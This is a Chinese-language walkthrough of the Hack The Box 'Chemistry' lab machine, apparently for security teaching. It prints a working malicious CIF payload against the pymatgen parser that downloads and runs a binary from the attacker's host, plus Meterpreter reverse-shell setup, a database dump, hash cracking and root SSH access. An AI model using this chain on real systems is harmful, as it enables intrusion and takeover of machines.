知识点:命令执行漏洞、本地文件包含
nmap -sC -sV -O -oN nmap.txt 10.10.11.38![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/10-1729940625.png "HTB靶场 Chemistry (Linux)[Easy]")
![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/6-1729940625.png "HTB靶场 Chemistry (Linux)[Easy]")
CIF文件导致命令执行
https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
data_5yOhtAoR_audit_creation_date 2018-06-08_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"loop__parent_propagation_vector.id_parent_propagation_vector.kxkykzk1 [0 0 0]_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("wget 10.10.16.9/sss.elf && chmod +x sss.elf && ./sss.elf");0,0,0'_space_group_magn.number_BNS 62.448_space_group_magn.name_BNS "P n' m a' "
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.10.16.9 lport=4446 -f elf>sss.elfpython -m http.server 80
msfconsoleuse exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 10.10.16.9set lport 4446run
![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/7-1729940626.png "HTB靶场 Chemistry (Linux)[Easy]")
![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/0-1729940627.png "HTB靶场 Chemistry (Linux)[Easy]")
sqlite3 /home/app/instance/database.db.tableselect * from user;
![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/0-1729940628.png "HTB靶场 Chemistry (Linux)[Easy]")
hashcat -m 0 rosa.hash rockyou –show![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/5-1729940628.png "HTB靶场 Chemistry (Linux)[Easy]")
ssh rosa@10.10.11.38![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/5-1729940629.png "HTB靶场 Chemistry (Linux)[Easy]")
netstat -tuln![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/3-1729940629.png "HTB靶场 Chemistry (Linux)[Easy]")
ssh rosa@10.10.11.38 -L 8080:localhost:8080![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/1-1729940630.png "HTB靶场 Chemistry (Linux)[Easy]")
![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/4-1729940630.png "HTB靶场 Chemistry (Linux)[Easy]")
![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/9-1729940632.png "HTB靶场 Chemistry (Linux)[Easy]")
chmod root_id_rsassh -I root_id_rsa root@10.10.11.38
![HTB靶场 Chemistry (Linux)[Easy]](http://cn-sec.com/wp-content/uploads/2024/10/1-1729940632.png "HTB靶场 Chemistry (Linux)[Easy]")
原文始发于微信公众号(Rsec):HTB靶场 Chemistry (Linux)[Easy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论